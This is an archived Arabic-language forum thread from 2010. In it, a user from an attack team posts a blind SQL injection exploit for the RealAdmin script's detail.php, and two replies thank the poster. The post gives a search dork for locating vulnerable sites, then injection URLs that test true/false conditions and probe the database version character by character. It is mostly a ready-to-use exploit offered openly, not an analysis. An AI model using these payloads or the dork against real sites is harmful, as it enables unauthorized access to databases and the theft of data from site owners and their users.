المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : RealAdmin (detail.php) Blind Sql Injection Vulnerability



AtT4CKxT3rR0r1ST
02-03-2010, 02:59 PM
RealAdmin (detail.php) Blind Sql Injection Vulnerability
================================================== ======

################################################## ##################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : RealAdmin
.:. Download Script: http://www.redcow.ca/products/realadmin/
.:. Bug Type : Blind Sql Injection
.:. Dork : "Powered by RealAdmin and Red Cow Technologies, Inc."

################################################## ##################

===[ Exploit ]===

www.site.com/detail.php?id=[Blind SQL INJECTION]


www.site.com/detail.php?id=NULL+and+1=1 >>> True
www.site.com/detail.php?id=NULL+and+1=2 >>> False


www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5 >>> True
www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4 >>> False


################################################## ##################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack

صقر العرب
02-05-2010, 07:54 PM
جزاك الله خيرا

هاوي حنانك
02-06-2010, 01:51 PM
مشكووور وما قصرت سلمت يداك